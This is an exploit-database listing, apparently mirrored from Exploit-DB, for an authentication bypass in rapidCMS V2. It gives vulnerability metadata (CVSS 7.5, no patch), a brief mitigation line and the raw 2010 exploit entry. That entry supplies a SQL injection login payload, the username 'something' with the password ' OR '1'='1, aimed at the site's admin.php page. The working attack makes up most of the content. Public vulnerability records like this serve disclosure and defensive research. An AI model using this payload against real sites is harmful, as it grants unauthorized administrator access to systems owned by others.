header-logo
Suggest Exploit
vendor:
rapidCMS
by:
Mahjong
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: rapidCMS
Affected Version From: V2
Affected Version To: V2
Patch Exists: NO
Related CWE: N/A
CPE: a:rapidcms:rapidcms:2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

rapidCMS V2 Authentication Bypass

User can bypass authentication by entering 'something' as username and ' OR '1'='1' as password.

Mitigation:

Implement strong authentication and authorization mechanisms.
Source

Exploit-DB raw data:

# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux
 
* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon

----------------------------------------------------------    

Exploit Authentication Bypass:
 
User: something
Pass: ' OR '1'='1
  
----------------------------------------------------------
   
Demo :
http://site.tld/admin.php
  
----------------------------------------------------------